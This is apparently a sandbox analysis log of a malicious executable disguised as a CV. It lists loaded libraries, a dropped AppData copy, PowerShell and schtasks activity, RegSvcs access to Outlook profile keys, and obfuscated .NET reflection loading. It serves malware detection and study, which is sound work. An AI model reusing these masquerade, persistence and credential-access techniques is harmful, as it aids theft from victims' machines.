                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: msdmo.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{41B89B6B-9399-11D2-9623-00C04F8EE628}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Kayla Dennis CV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Kayla Dennis CV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000B.00000002.3283027662.0000000000C92000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000B.00000002.3283027662.0000000000C92000.00000002.00000001.01000000.0000000D.sdmp

                Data Obfuscation

                barindex
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, w1Wamsg80XvcbX1PDi.cs.Net Code: Mn7q87oQn4 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, w1Wamsg80XvcbX1PDi.cs.Net Code: Mn7q87oQn4 System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeCode function: 0_2_07D7FB7F push eax; retf 0_2_07D7FB8D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_012F4000 push eax; ret 11_2_012F400A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_012F40C5 push eax; ret 11_2_012F3FFA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_012F3F90 push eax; ret 11_2_012F3F7A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_012F3F90 push eax; ret 11_2_012F401A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_012F3F90 push eax; ret 11_2_012F402A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_012F3FE0 push eax; ret 11_2_012F3FFA
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeCode function: 12_2_0799EE0B push eax; retf 12_2_0799EE0D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01014000 push eax; ret 17_2_0101400A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01014010 push eax; ret 17_2_0101401A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_010140C5 push eax; ret 17_2_01013FFA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_010124B9 push 8BFFFFFFh; retf 17_2_010124BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01013F90 push eax; ret 17_2_01013F7A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01013FE0 push eax; ret 17_2_01013FFA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_056344E8 push eax; iretd 17_2_056344E9
                Source: Kayla Dennis CV.exeStatic PE information: section name: .text entropy: 7.899161344113745
                Source: lyKbfEsVYfQfU.exe.0.drStatic PE information: section name: .text entropy: 7.899161344113745
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, Ae3EapnZ1ndJoCaosg.csHigh entropy of concatenated method names: 'fBwyW76B29', 'zr7yME9E5V', 'rEUyUpqDjI', 'AMmUdvjMND', 'PfSUz7aPTA', 'oJYyBtP5HZ', 'GeqyHdB3k3', 'o89yS9ieiV', 'g8GylhCpNr', 'Uyqyq8Bs3K'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, zZBwcFdoCBhDHvdrMM.csHigh entropy of concatenated method names: 'TJJvMsFir8', 'wM6v5STYFS', 'Ax8vU2BvHU', 'y4CvyCx9cs', 'vbfv2LJTx8', 'gGXvgcBxFQ', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, zeMT1koqZxrLyrXShU.csHigh entropy of concatenated method names: 'kSl2bZ7c8j', 'zVC2fOd46r', 'Od22JtDZlm', 'U5U2XR3lLN', 'lkL21AOism', 'Yd32CYZ7hM', 'U5M2ndtZ3F', 'O2e2wfMXLS', 'b6F2jQIsnI', 'aoe2TDkCtn'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, qFWcJZVwvHTZWf33J1.csHigh entropy of concatenated method names: 'Ojr7TpZypU', 'E7I709nnLq', 'wkN7Vu68hv', 'v3P7Zfv0va', 'LQa7fuBIeE', 'eDK7JVO9RZ', 'iTL7XDouVq', 'Oh5717ufkx', 'x1D7CdQHe7', 'Alv7nPaJKn'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, Et4w0UHHdcftwrrdAtp.csHigh entropy of concatenated method names: 'UeAvdSb4ZQ', 'IX2vzGsBHi', 'gVH6BECLu2', 'm6X6HUWPbY', 'lDT6Sp6Uvg', 'geE6lHmt9R', 'CvH6q81Fe7', 'qqb6cBIBpF', 'BK36WFbO4U', 'cIa6AcK8GZ'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, K9CQNMrr6cZBHfROeJ.csHigh entropy of concatenated method names: 'ToString', 'guoO9VrYpi', 'rdkOfuukvn', 'GImOJODpH8', 'QilOXgKLCE', 'xViO1craXK', 'dmROC8ejpL', 'Ua6Onpog98', 'hMIOwMQhJ1', 'e7TOjwlfGl'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, oyVIcTqqP4C6AwsfEK.csHigh entropy of concatenated method names: 'rJUHy0Wcui', 'fSwHgH93uG', 'uS6HirC03X', 'XOQHGFxe67', 'UdqH7Yjy05', 'wP7HOHCDY9', 'e4Ou1PlVZn1FbSUMMI', 'KEpxqRSxBGMhhnKR7g', 'K6Z1L4jGHejX3XdxPj', 'cNCHHQUBGk'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, rNBnHnp1WKJm5AxIZM.csHigh entropy of concatenated method names: 'ltp27jKoUC', 'ikc2FKrRkY', 'IXm22SMVju', 'Nsp265KOsC', 'J1O2xKNZJQ', 'eMu2mD88QR', 'Dispose', 'H5LKWTj2jg', 'CViKAOxeoP', 'D8FKMG86Jh'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, Ch0lk6HBVj9gH1dXbDR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'B8Iv93e3k5', 'hDcv05MZC4', 'YMtvu5wDCE', 'gFQvVFUkcA', 'MWQvZdEQuL', 'vx1vrnjrBM', 'JMSvhsrxMu'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, qq0i0xtS6rC03X4OQF.csHigh entropy of concatenated method names: 'DPPMY4eC7s', 'M8nMLaAP6K', 'Eq0MQN2xFb', 'h1QMtX7muk', 'CAAM7UofyA', 'a7fMOHTjPd', 'frSMFu4K4t', 'dZmMKCCqru', 'TPYM2AMMUY', 'FdNMv7wZOA'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, EoWQELuK6MS0aI4AZn.csHigh entropy of concatenated method names: 'LcN3QQ3861', 'IOZ3tYvelN', 'SBH3bGHt7a', 'BWl3fF0Mrp', 'ja23XXrhMM', 'Ggw318aOcR', 'EXj3nvJsQB', 'kW53wLJgMl', 'WxS3T1PNJZ', 'dLK39eAaax'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, j05EP7bHCDY9bVeb91.csHigh entropy of concatenated method names: 'HuXUcUK1Wt', 'yAtUA96WRN', 'p5RU5EUSpb', 'kNcUytuXHc', 'XNKUgCaH1Q', 'me45R9T2DP', 'OTc5ayrgrt', 'FZS5p6OhMm', 'FLl54NAG8P', 'NJ55oDCZBG'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, mcLAcvjWC5sDoJTaiB.csHigh entropy of concatenated method names: 'G7lye2NI3l', 'j1NyDSyr5P', 'PrGy8iMkNf', 'XXCyYSCkJL', 'bg1yk0uLmk', 'jgmyLwAXpd', 'WCNyNscGDR', 'XPAyQKFZpJ', 'X5lyt14bPC', 'QdwyIH1veW'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, ve67QJIErbjQ2RdqYj.csHigh entropy of concatenated method names: 'Aot5koFUs9', 'Bvn5NfFVNJ', 'nSeMJvcmYb', 'mDuMXbva5f', 'FvuM1cGliW', 'glOMCI2RB1', 'eAfMnppDA1', 'ItaMwPNlqS', 'H9LMjmoe8p', 'rIRMT1mgpR'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, w1Wamsg80XvcbX1PDi.csHigh entropy of concatenated method names: 'MinlcY01X1', 'buxlW2A0PM', 'pCAlAapHkX', 'zdYlMw9nw9', 'aR2l548Ys8', 'cg5lU0EjOp', 'Fk1lyh2hEa', 'r0GlgC8PMW', 'c15lP4C6iv', 'peIli6pPbW'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, FoAFRBaaCt9wLgIjEA.csHigh entropy of concatenated method names: 'bI2F43Kuhd', 'iPtFdBG81p', 'hMSKBntYOx', 'AnBKHuuUjU', 'UNPF9fXWmr', 'rSqF0RkJL1', 'Jc5FuMe4Gi', 'KetFV6gXMe', 'I9xFZNUtNT', 'jbkFrsD0Xj'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, qfee45ScyUVTNoxrqO.csHigh entropy of concatenated method names: 'r438KqbKP', 'GhaYb3nJP', 'uL1LZ1IhJ', 'xXCNJqLLF', 'xretaYAeJ', 'X4rIsXJkr', 'okUWK9PwRXxVfei56R', 'Usr43lfDOXW0PJ7320', 'pRpKo1xgj', 'UQZvfsAAk'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, XLJX4JHqAW5aPYZSNNV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Q1is2oA8Gd', 'VrOsvcE3Om', 'mtHs66PReB', 'MZSssXyLna', 'U1FsxIDhrk', 'L1RsEnZbLP', 'ejwsmx2FSo'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, qKGIPyzat1P0lbO4vD.csHigh entropy of concatenated method names: 'rPUvLGJ45q', 'l5UvQUXi1R', 'gr1vtiQhxk', 'bUrvbtyXZB', 'MpKvfQGK9v', 'AcGvXnUjYL', 'X4dv1gpMMA', 'CIlvmiYf0u', 'qngvedj0qJ', 'R8FvDRF3bv'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, i0WcuiQWSwH93uGufO.csHigh entropy of concatenated method names: 'UDKAV7WacB', 'NGqAZYdiCx', 'IumArdoEWb', 'q3sAhNXYUC', 'Yf0ARC1XLT', 'N44Aash1g4', 'EsZAp2VnQ4', 'BHyA4ZCssE', 'fapAoCYMBF', 'D8CAd5Ngg6'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, uwQd63hVoUjkE35mIB.csHigh entropy of concatenated method names: 'ehoFiZGsZt', 'G54FGnFHS9', 'ToString', 'JnnFWK9XIj', 'WLeFA4QgJo', 'TfZFMaBdJq', 'qdDF5mCkLb', 'aVFFUqDdId', 'yK1Fyd2LBE', 'TETFgDy7u1'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, xKwrqWApA4CjlIblEN.csHigh entropy of concatenated method names: 'Dispose', 'rJmHo5AxIZ', 'OTySfiHa95', 'zKGsRrLkOU', 'gf7HdXJ9qh', 'AiYHzwrMHp', 'ProcessDialogKey', 'Nd8SBeMT1k', 'eZxSHrLyrX', 'chUSSYZBwc'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, Ae3EapnZ1ndJoCaosg.csHigh entropy of concatenated method names: 'fBwyW76B29', 'zr7yME9E5V', 'rEUyUpqDjI', 'AMmUdvjMND', 'PfSUz7aPTA', 'oJYyBtP5HZ', 'GeqyHdB3k3', 'o89yS9ieiV', 'g8GylhCpNr', 'Uyqyq8Bs3K'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, zZBwcFdoCBhDHvdrMM.csHigh entropy of concatenated method names: 'TJJvMsFir8', 'wM6v5STYFS', 'Ax8vU2BvHU', 'y4CvyCx9cs', 'vbfv2LJTx8', 'gGXvgcBxFQ', 'Next', 'Next', 'Next', 'NextBytes'
